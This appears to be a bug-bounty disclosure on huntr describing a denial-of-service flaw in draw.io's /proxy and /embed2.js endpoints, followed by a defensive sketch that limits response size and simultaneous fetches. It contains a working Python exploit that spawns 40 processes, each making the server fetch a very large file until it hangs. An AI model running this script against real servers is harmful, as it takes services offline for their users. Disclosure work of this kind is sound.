huntr | amammad | AA087215-80E1-433D-B870-650705630E69
May 24, 2022 - 3:51 p.m.

Proxying big files leads to potential DoS

2022-05-24 15:51:36
amammad
www.huntr.dev
proxy vulnerability
big file dos
multiprocessing attack
server hangup

EPSS

0.001

Percentile

30.8%

Description

Consider the following script:

exploit.py

Replace drawio_docker_instace with your address; big_file_address should serve a big image file (> 250 MB).

from multiprocessing import Process
import requests

def fun():
    try:
        requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
        #requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
        print("OK")
    except:
        print("error from server")

def main():
    for i in range(1,40):
        p = Process(target=fun, args=())
        p.start()

if __name__ == '__main__':
    main()

I upload forty 250 MB photos at the same time, and the server hangs up (I tested it on an UpCloud basic server plan).
Both /proxy and /embed2.js were vulnerable to DoS, and /embed2.js was more vulnerable, as I saw in the Docker status. You can check it yourself with my POC.py file.

Proof of Concept

The POC is for the /embed2.js endpoint; for the /proxy endpoint we should increase the number of simultaneous processes.
https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing
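On the defensive side, a fetch-and-relay endpoint like the ones in this report needs a hard cap on response size and on simultaneous upstream fetches. The sketch below is an added example, not draw.io's code and not part of the original report; the names relay, ProxyLimitError and FETCH_SLOTS and the limit values are assumptions chosen for illustration.

```python
import threading

MAX_BYTES = 10 * 1024 * 1024   # assumed cap on one proxied response body
MAX_CONCURRENT = 4             # assumed cap on simultaneous upstream fetches
CHUNK = 64 * 1024              # relay in small chunks, never buffer the whole body

class ProxyLimitError(Exception):
    """Raised when a proxied fetch must be refused or aborted."""

# Shared by every request handler thread in the process.
FETCH_SLOTS = threading.BoundedSemaphore(MAX_CONCURRENT)

def relay(upstream, client, declared_length=None, max_bytes=MAX_BYTES):
    """Copy upstream -> client under both limits; return the bytes relayed.

    upstream and client are file-like objects (response body, client socket).
    declared_length is the upstream Content-Length header value, if any.
    """
    # Cheap early reject when the upstream announces an oversized body.
    if declared_length is not None and declared_length > max_bytes:
        raise ProxyLimitError("declared length exceeds cap")
    # Refuse instead of queueing, so a burst of requests cannot pile up.
    if not FETCH_SLOTS.acquire(blocking=False):
        raise ProxyLimitError("too many concurrent proxy fetches")
    try:
        sent = 0
        while True:
            chunk = upstream.read(CHUNK)
            if not chunk:
                return sent
            sent += len(chunk)
            # Content-Length can be absent or wrong, so count real bytes too.
            if sent > max_bytes:
                raise ProxyLimitError("body exceeds cap")
            client.write(chunk)
    finally:
        FETCH_SLOTS.release()
```

A handler that catches ProxyLimitError should close the client connection, since part of the body may already have been written when the cap is hit.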
